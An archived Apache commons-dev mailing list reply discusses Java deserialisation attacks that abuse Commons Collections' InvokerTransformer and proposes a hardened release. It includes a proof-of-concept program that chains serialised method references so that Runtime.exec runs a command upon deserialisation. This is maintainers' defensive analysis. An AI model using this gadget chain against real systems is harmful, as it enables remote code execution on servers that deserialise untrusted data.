commons-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Thomas Neidhart <>
Subject Re: [collection][security] InvokerTransformer missused in java object serialisation exploits
Date Fri, 06 Nov 2015 23:56:00 GMT
On 11/06/2015 10:25 PM, Bernd Eckenfels wrote:
> ello,
> I came across this article:
> It describes attacks against common Java applications with
> pre-authentication requests using malicious Java Object serialisation.
> It builds upon the work of Gabriel Lawrence (@gebl) and Chris Frohoff
> (@frohoff) (presented on January 28th, 2015, “Marshalling Pickles”
> given at AppSecCali)
> The ysoserial tool has some sample payloads, two use
> commons-collection oac.collections.functors.InvokerTransformer. * 
> The class itself is rather handy to break out of the readObject()
> chains to execute arbitrary methods.
> I do'nt recall any discussion here about this
> class. Is this currently handled/reported? Of course the more general
> problem is using serialisation with untusted peers, and if
> commons-collection fixes this, there might still be other vectors, but
> still I think it would be good to do something against that "bad press"?

I was not aware of this yet, thanks for the pointers.

If we would remove the problematic classes and release a new collections
version (for the 3.x or 4.x branch) we would break source and binary

It might be acceptable/doable to release a collections version with an
additional maven classifier (e.g. -hardened) that removes the relevant
classes and explain the compatibility issues in detail in the release
notes. What do others think about something like that?

btw. with Java 8 you can do similar things by using serialized method
references. I did create a very simple example to illustrate the issue:

public class MyTest {

	public static void main(String[] args) throws Exception {
    	final SAM1 m1 = (SAM1 & Serializable) Runtime::getRuntime;
    	final SAM2 m2 = (SAM2 & Serializable) Runtime::exec;
    	Transformer t1 = (Transformer & Serializable) (input) -> m1.action();
    	Transformer t2 = (Transformer & Serializable) (input) -> {
    		try {
    			Process p = m2.action((Runtime) input, "ls");
    			String line;
    			StringBuilder output = new StringBuilder();
    			BufferedReader reader = new BufferedReader(new
    			while ((line = reader.readLine()) != null) {
    			return output.toString();
    		} catch (IOException e) {
    			return null;

    	ChainedTransformer chain = new ChainedTransformer(t1, t2);
    	TransformedList list = TransformedList.transformedList(new
ArrayList(), chain);

        FileOutputStream fos = new FileOutputStream("test.ser");
        ObjectOutputStream os = new ObjectOutputStream(fos);

        FileInputStream fis = new FileInputStream("test.ser");
        ObjectInputStream ois = new ObjectInputStream(fis);

        List l2 = (List)ois.readObject();


        //Print the result

    interface SAM1 {
	Runtime action();

    interface SAM2 {
        Process action(Runtime r, String s) throws IOException;


To unsubscribe, e-mail:
For additional commands, e-mail:

View raw message